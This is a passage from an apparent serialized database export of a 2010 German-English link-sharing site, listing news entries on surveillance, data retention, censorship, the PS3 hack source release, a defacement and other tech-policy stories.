&lt;/p&gt;</field><field type="CharField" name="external_url">http://news.yahoo.com/s/yblog_upshot/20100903/us_yblog_upshot/pentagon-declined-to-investigate-hundreds-of-purchases-of-child-pornography</field><field type="FileField" name="page_screenshot">page_shots/2010/09/03/pentagondeclinedtoinvestigatehundredsofpurch.png</field><field type="SlugField" name="slug">pentagondeclinedtoinvestigatehundredsofpurch</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-03 21:39:55</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">child porn, dod</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="454" model="submitter.newsentry"><field type="CharField" name="title">Preschoolers being radio-tagged </field><field type="TextField" name="excerpt">Mary Robinette Kowal sez, "Preschoolers in Richmond, California are being handed RFID jerseys when they get to school. The ACLU points out that in addition to the privacy concerns, these are not secure tags. It has the potential to make kidnapping and stalking very easy." </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Mary Robinette Kowal sez, "Preschoolers in Richmond, California are being handed RFID jerseys when they get to school. The ACLU points out that in addition to the privacy concerns, these are not secure tags. It has the potential to make kidnapping and stalking very easy."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.aclu.org/blog/technology-and-liberty/dont-let-schools-chip-your-kids</field><field type="FileField" name="page_screenshot">page_shots/2010/09/03/preschoolersbeingradio-tagged_.png</field><field type="SlugField" name="slug">preschoolersbeingradio-tagged</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-03 17:55:29</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">aclu bürgerrechte rfid surveillance tracking</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object></field></object><object pk="453" model="submitter.newsentry"><field type="CharField" name="title">Datenklo Nachbau</field><field type="TextField" name="excerpt">Datenklo rebuild.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Datenklo rebuild.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://runningserver.com/?page=runningserver.content.datenklo</field><field type="FileField" name="page_screenshot">page_shots/2010/09/03/datenklonachbau.png</field><field type="SlugField" name="slug">datenklonachbau</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-03 10:43:05</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">datenklo historic</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="452" model="submitter.newsentry"><field type="CharField" name="title">heise online - Bürgerrechtler: Vorratsdatenspeicherung laut Kriminalitätsstatistik überflüssig</field><field type="TextField" name="excerpt">Im Jahr 2008, als Verbindungsdaten nur sporadisch gespeichert wurden, seien 167.451 Internet-Straftaten registriert worden, sie konnten zu 79,8 Prozent aufgeklärt werden, erläutern die Bürgerrechtler in einer Mitteilung. Im Jahr 2009, in dem alle Interneteinwahlen und E-Mails für sechs Monate protokolliert worden seien, habe die Polizei demgegenüber 206.909 Internet-Straftaten registriert. 75,7 Prozent davon seien aufgeklärt worden.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Im Jahr 2008, als Verbindungsdaten nur sporadisch gespeichert wurden, seien 167.451 Internet-Straftaten registriert worden, sie konnten zu 79,8 Prozent aufgeklärt werden, erläutern die Bürgerrechtler in einer Mitteilung. Im Jahr 2009, in dem alle Interneteinwahlen und E-Mails für sechs Monate protokolliert worden seien, habe die Polizei demgegenüber 206.909 Internet-Straftaten registriert. 75,7 Prozent davon seien aufgeklärt worden.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Buergerrechtler-Vorratsdatenspeicherung-laut-Kriminalitaetsstatistik-ueberfluessig-1071139.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/02/heiseonline-burgerrechtlervorratsdatenspeiche.png</field><field type="SlugField" name="slug">heiseonline-burgerrechtlervorratsdatenspeiche</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-02 22:42:28</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">vorratsdatenspeicherung</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="451" model="submitter.newsentry"><field type="CharField" name="title">Ping review / Analyse von spiegel.de</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.spiegel.de/netzwelt/gadgets/0,1518,715323,00.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/02/pingreviewanalysevonspiegelde.png</field><field type="SlugField" name="slug">pingreviewanalysevonspiegelde</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-02 22:03:00</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">apple, ping, social network</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="450" model="submitter.newsentry"><field type="CharField" name="title">Microsoft Patents Operating System Shutdown | ConceivablyTech</field><field type="TextField" name="excerpt">Microsoft just received confirmation of a patent that hands the company the intellectual property of shutting an operating system down.
von Fefe.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Microsoft just received confirmation of a patent that hands the company the intellectual property of shutting an operating system down.
&lt;/p&gt;
&lt;p&gt;von Fefe.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.conceivablytech.com/2530/products/microsoft-patents-operating-system-shutdown/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/02/microsoftpatentsoperatingsystemshutdownconc.png</field><field type="SlugField" name="slug">microsoftpatentsoperatingsystemshutdownconc</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-02 10:45:12</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">microsoft patent</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="2"></object></field></object><object pk="449" model="submitter.newsentry"><field type="CharField" name="title">NRW: Grüne wollen Jugendmedienschutz-Staatsvertrag (JMStV) zustimmen » Pottblog</field><field type="TextField" name="excerpt">NRW: Grüne wollen Jugendmedienschutz-Staatsvertrag (JMStV) zustimmen</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;NRW: Grüne wollen Jugendmedienschutz-Staatsvertrag (JMStV) zustimmen
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.pottblog.de/2010/09/01/nrw-gruene-wollen-jugendmedienschutz-staatsvertrag-jmstv-zustimmen/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/02/nrwgrunewollenjugendmedienschutz-staatsvertrag.png</field><field type="SlugField" name="slug">nrwgrunewollenjugendmedienschutz-staatsvertrag</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-02 00:08:39</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">jmstv nrw</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object></field></object><object pk="448" model="submitter.newsentry"><field type="CharField" name="title">Source Code des PS3-Hacks veröffentlicht</field><field type="TextField" name="excerpt">Um das Kopierschutzsystem zu überwinden, geht der simulierte USB-Hub in mehreren Schritten vor und gaukelt der PS3 den Anschluss verschiedener Geräte in einer bestimmten Reihenfolge vor wobei er mehrere Pufferüberläufe provoziert, um unterschiedliche Daten und Code auf den Stack zu schreiben. Im letzten Schritt wird der gesamte Code ausgeführt.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Um das Kopierschutzsystem zu überwinden, geht der simulierte USB-Hub in mehreren Schritten vor und gaukelt der PS3 den Anschluss verschiedener Geräte in einer bestimmten Reihenfolge vor wobei er mehrere Pufferüberläufe provoziert, um unterschiedliche Daten und Code auf den Stack zu schreiben. Im letzten Schritt wird der gesamte Code ausgeführt.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Source-Code-des-PS3-Hacks-veroeffentlicht-1070859.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/01/sourcecodedesps3-hacksveroffentlicht.png</field><field type="SlugField" name="slug">sourcecodedesps3-hacksveroffentlicht</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">14</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-01 19:45:37</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">bufferoverflow opensource ps3</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="447" model="submitter.newsentry"><field type="CharField" name="title">Algerian Hackers Attack Wrong Website - ITProPortal.com</field><field type="TextField" name="excerpt">A group of misinformed Algerian 'cyber-pirates' attacked the official website of the Belvoir Castle, mistaking it for the Belvoir Fortress in Israel.
The pirate group, known as Dz-SeC, hijacked the website and displayed anti-Jewish slogans in Arabic on the homepage, along with a picture of the Algerian national flag.
A spokesperson for the Belvoir Castle said in a statement to The Telegraph that “We've nothing to do with the Middle-East. I just help to organise the teddy bears' picnic. It does make more sense that they meant to target the fortress in Israel rather than the castle in Leicestershire.”
</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;A group of misinformed Algerian 'cyber-pirates' attacked the official website of the Belvoir Castle, mistaking it for the Belvoir Fortress in Israel.
&lt;/p&gt;
&lt;p&gt;The pirate group, known as Dz-SeC, hijacked the website and displayed anti-Jewish slogans in Arabic on the homepage, along with a picture of the Algerian national flag.
&lt;/p&gt;
&lt;p&gt;A spokesperson for the Belvoir Castle said in a statement to The Telegraph that “We've nothing to do with the Middle-East. I just help to organise the teddy bears' picnic. It does make more sense that they meant to target the fortress in Israel rather than the castle in Leicestershire.”
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.itproportal.com/portal/news/article/2010/9/1/algerian-hackers-attack-wrong-website/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/01/no_page_shot.png</field><field type="SlugField" name="slug">algerianhackersattackwrongwebsite-itproporta</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-01 17:47:05</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">defacement</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="446" model="submitter.newsentry"><field type="CharField" name="title">Obama administration: &amp;quot;Piracy is flat, unadulterated theft&amp;quot;</field><field type="TextField" name="excerpt">Change we can believe in.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Change we can believe in.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/tech-policy/news/2010/08/obama-administration-piracy-is-flat-unadulterated-theft.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/08/31/obamaadministrationquotpiracyisflatunadul.png</field><field type="SlugField" name="slug">obamaadministrationquotpiracyisflatunadul</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-31 23:16:46</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">obama piracy</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="445" model="submitter.newsentry"><field type="CharField" name="title">Judge: No Difference Between Cell Phone Tracking and GPS Vehicle Tracking</field><field type="TextField" name="excerpt">Judge James Orenstein in the Eastern District of New York ruled last Friday that historical cell phone location data is just as intrusive to privacy as GPS tracking. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Judge James Orenstein in the Eastern District of New York ruled last Friday that historical cell phone location data is just as intrusive to privacy as GPS tracking.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.aclu.org/blog/technology-and-liberty/judge-no-difference-between-cell-phone-tracking-and-gps-vehicle-tracking</field><field type="FileField" name="page_screenshot">page_shots/2010/08/31/judgenodifferencebetweencellphonetrackinga.png</field><field type="SlugField" name="slug">judgenodifferencebetweencellphonetrackinga</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-31 21:05:51</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">bürgerrechte gps gsm handy politics polizeistaat tracking</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="444" model="submitter.newsentry"><field type="CharField" name="title">Welcome to Evoke 2010 &amp;raquo; Evoke 2010</field><field type="TextField" name="excerpt">Evoke Demo Party im Bericht von [heise](http://www.heise.de/newsticker/meldung/Evoke-2010-Party-mit-Wuerfeln-Pasta-und-freizuegigem-Geldautomat-1069635.html)
N' bissl bewerben, so dass die Leute mal in youtube gucken...</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Evoke Demo Party im Bericht von &lt;a href="http://www.heise.de/newsticker/meldung/Evoke-2010-Party-mit-Wuerfeln-Pasta-und-freizuegigem-Geldautomat-1069635.html"&gt;heise&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;N' bissl bewerben, so dass die Leute mal in youtube gucken...
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.evoke.eu/2010/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/31/welcometoevoke2010raquoevoke2010.png</field><field type="SlugField" name="slug">welcometoevoke2010raquoevoke2010</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-31 15:05:07</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">evoke</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="8"></object></field></object><object pk="443" model="submitter.newsentry"><field type="CharField" name="title">Hackers blind quantum cryptographers</field><field type="TextField" name="excerpt">Quantum hackers have performed the first 'invisible' attack on two commercial quantum cryptographic systems. By using lasers on the systems — which use quantum states of light to encrypt information for transmission — they have fully cracked their encryption keys, yet left no trace of the hack.
Genau das sollte ja nie möglich sein, oder?</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Quantum hackers have performed the first 'invisible' attack on two commercial quantum cryptographic systems. By using lasers on the systems — which use quantum states of light to encrypt information for transmission — they have fully cracked their encryption keys, yet left no trace of the hack.
&lt;/p&gt;
&lt;p&gt;Genau das sollte ja nie möglich sein, oder?
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.nature.com/news/2010/100829/full/news.2010.436.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/30/hackersblindquantumcryptographersnaturenews_.png</field><field type="SlugField" name="slug">hackersblindquantumcryptographersnaturenews</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-30 22:10:28</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">crypto hack quantum</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="442" model="submitter.newsentry"><field type="CharField" name="title"> For Immediate Release: GATES FOUNDATION INVESTS IN MONSANTO - Community Alliance for Global Justice</field><field type="TextField" name="excerpt">Die Gates Stiftung tut ja sooo viel Gutes! Hat in [Südafrika im Chemical Valley](http://www.commondreams.org/headlines07/0107-03.htm) investiert, in die Pharma-Lobby und jetzt in Monsanto. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die Gates Stiftung tut ja sooo viel Gutes! Hat in &lt;a href="http://www.commondreams.org/headlines07/0107-03.htm"&gt;Südafrika im Chemical Valley&lt;/a&gt; investiert, in die Pharma-Lobby und jetzt in Monsanto.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.seattleglobaljustice.org/2010/08/for-immediate-release-gates-foundation-invests-in-monsanto/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/30/forimmediatereleasegatesfoundationinvests.png</field><field type="SlugField" name="slug">forimmediatereleasegatesfoundationinvests</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-30 22:01:51</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">microsoft</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="441" model="submitter.newsentry"><field type="CharField" name="title">Killerspiele sollen als Politiker-Ausrede wegfallen - The Inquirer DE</field><field type="TextField" name="excerpt">Die Bundestags-LAN-Party soll die Zeigfinger-Mentalität vieler Politiker ändern, sagen die drei Initiatoren. »Killerspiele« sind eben nicht an allem Ungemach der Welt schuld.Die LAN-Party, die im Herbst im Bundestag stattfinden soll, wird eine »differenzierte Betrachtungsweise« fördern, meinen die drei Initiatoren der Aktion.
Dorothee Bär (CSU), Jimmy Schulz (FDP) und Manuel Höferlin (auch FDP) wollen in einem Land, in dem LAN-Parties verboten aber Schützenvereine erlaubt werden , alle Abgeordneten einladen und dabei auch »einen etwas gewaltsameren Shooter« anbieten</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die Bundestags-LAN-Party soll die Zeigfinger-Mentalität vieler Politiker ändern, sagen die drei Initiatoren. »Killerspiele« sind eben nicht an allem Ungemach der Welt schuld.Die LAN-Party, die im Herbst im Bundestag stattfinden soll, wird eine »differenzierte Betrachtungsweise« fördern, meinen die drei Initiatoren der Aktion.
&lt;/p&gt;
&lt;p&gt;Dorothee Bär (CSU), Jimmy Schulz (FDP) und Manuel Höferlin (auch FDP) wollen in einem Land, in dem LAN-Parties verboten aber Schützenvereine erlaubt werden , alle Abgeordneten einladen und dabei auch »einen etwas gewaltsameren Shooter« anbieten
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theinquirer.de/2010/08/25/killerspiele-sollen-als-politiker-ausrede-wegfallen.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/30/killerspielesollenalspolitiker-ausredewegfalle.png</field><field type="SlugField" name="slug">killerspielesollenalspolitiker-ausredewegfalle</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-30 17:43:23</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">bundestag killerspiele</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="440" model="submitter.newsentry"><field type="CharField" name="title"> Google, Facebook To Microsoft&amp;#8217;s Paul Allen: Your Argument Is Invalid </field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://techcrunch.com/2010/08/27/paul-allen-google-faceboo/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/28/googlefacebooktomicrosoft8217spaulallen.png</field><field type="SlugField" name="slug">googlefacebooktomicrosoft8217spaulallen</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-28 09:52:40</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">microsoft patent</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="439" model="submitter.newsentry"><field type="CharField" name="title">Nokia Siemens slammed for supplying snoop tech to Iran • The Register</field><field type="TextField" name="excerpt">An Iranian journalist imprisoned in that country without trial since June 2009 is suing telecommunications concern Nokia Siemens for allegedly providing the surveillance equipment that led to his capture.
Isa Saharkhiz went into hiding following Iran's 2009 presidential elections, after publishing an article branding the Grand Ayatollah as a hypocrite who was primarily responsible for vote tallies widely regarded as being fraudulent.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;An Iranian journalist imprisoned in that country without trial since June 2009 is suing telecommunications concern Nokia Siemens for allegedly providing the surveillance equipment that led to his capture.
&lt;/p&gt;
&lt;p&gt;Isa Saharkhiz went into hiding following Iran's 2009 presidential elections, after publishing an article branding the Grand Ayatollah as a hypocrite who was primarily responsible for vote tallies widely regarded as being fraudulent.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/08/23/nokia_siemens_spy_centers/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/27/nokiasiemensslammedforsupplyingsnooptechto.png</field><field type="SlugField" name="slug">nokiasiemensslammedforsupplyingsnooptechto</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-27 23:59:02</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">surveillance</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="438" model="submitter.newsentry"><field type="CharField" name="title">Glibc Is Finally Free Software</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://yro.slashdot.org/story/10/08/26/2339249/Glibc-Is-Finally-Free-Software?from=rss</field><field type="FileField" name="page_screenshot">page_shots/2010/08/27/glibcisfinallyfreesoftware.png</field><field type="SlugField" name="slug">glibcisfinallyfreesoftware</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">14</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-27 18:54:55</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">glibc gnu gpl rpc sun</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="2"></object></field></object><object pk="437" model="submitter.newsentry"><field type="CharField" name="title">Kapitulationserklärung gegenüber Kinderschändern - Arbeitskreis gegen Internet-Sperren und Zensur (AK Zensur)</field><field type="TextField" name="excerpt">AK Zensur veröffentlicht BKA-Dokumente, die zeigen: das »Löschen« wurde bisher halbherzig durchgeführt, deswegen will BKA Sperren</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;AK Zensur veröffentlicht BKA-Dokumente, die zeigen: das »Löschen« wurde bisher halbherzig durchgeführt, deswegen will BKA Sperren
&lt;/p&gt;</field><field type="CharField" name="external_url">http://ak-zensur.de/2010/08/kapitulation.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/27/kapitulationserklarunggegenuberkinderschandern.png</field><field type="SlugField" name="slug">kapitulationserklarunggegenuberkinderschandern</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-27 15:57:02</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">censorship</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="436" model="submitter.newsentry"><field type="CharField" name="title">Drogeriekette: 150.000 Kundendaten von Schlecker waren frei zugänglich - SPIEGEL ONLINE - Nachrichten - Wirtschaft</field><field type="TextField" name="excerpt">150.000 Datensätze von Online-Kunden der Drogeriekette konnten im Internet abgerufen werden.
Dazu gehörten der Vor- und Nachname, die Adresse, das Geschlecht, die E-Mail-Adresse und das Kundenprofil. Außerdem waren 7,1 Millionen E-Mail-Adressen von Newsletter-Kunden der Drogeriefirma abrufbar.
Detail aus dem Artikel:
So zeigte vor kurzem eine Untersuchung der Unternehmensberatung Accenture, dass bei fast 70 Prozent der deutschen Unternehmen und Behörden in den vergangenen zwei Jahren Daten von Kunden und Mitarbeitern abhandengekommen sind. Fast ein Drittel hatte in dem Zeitraum sogar sechsmal oder häufiger Daten verloren.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;150.000 Datensätze von Online-Kunden der Drogeriekette konnten im Internet abgerufen werden.
Dazu gehörten der Vor- und Nachname, die Adresse, das Geschlecht, die E-Mail-Adresse und das Kundenprofil. Außerdem waren 7,1 Millionen E-Mail-Adressen von Newsletter-Kunden der Drogeriefirma abrufbar.
&lt;/p&gt;
&lt;p&gt;Detail aus dem Artikel:
So zeigte vor kurzem eine Untersuchung der Unternehmensberatung Accenture, dass bei fast 70 Prozent der deutschen Unternehmen und Behörden in den vergangenen zwei Jahren Daten von Kunden und Mitarbeitern abhandengekommen sind. Fast ein Drittel hatte in dem Zeitraum sogar sechsmal oder häufiger Daten verloren.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.spiegel.de/wirtschaft/unternehmen/0,1518,714051,00.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/27/drogeriekette150000kundendatenvonschleckerw.png</field><field type="SlugField" name="slug">drogeriekette150000kundendatenvonschleckerw</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-27 11:00:27</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">dataloss schlecker</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="10"></object></field></object><object pk="435" model="submitter.newsentry"><field type="CharField" name="title">US movie tickets get biggest price hike in history</field><field type="TextField" name="excerpt">Hilfe! Filesharer machen die Kinos und die Filmindustrie kaputt.
Box-Office Zahlen zeigen das Gegenteil.
the industry has been hauling in the cash at the box office. 2007, 2008, and 2009 all set new historic highs for movie theater revenue in the US and Canada, and 2010 looks poised to do even bigger business.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Hilfe! Filesharer machen die Kinos und die Filmindustrie kaputt.
Box-Office Zahlen zeigen das Gegenteil.
the industry has been hauling in the cash at the box office. 2007, 2008, and 2009 all set new historic highs for movie theater revenue in the US and Canada, and 2010 looks poised to do even bigger business.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/tech-policy/news/2010/08/us-movie-tickets-get-biggest-price-hike-in-history.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/08/26/usmovieticketsgetbiggestpricehikeinhistory.png</field><field type="SlugField" name="slug">usmovieticketsgetbiggestpricehikeinhistory</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-26 21:34:09</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">contentmafia, file sharing</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="434" model="submitter.newsentry"><field type="CharField" name="title">2010 smashes vulnerability records - V3.co.uk - formerly vnunet.com</field><field type="TextField" name="excerpt">Es wird nicht 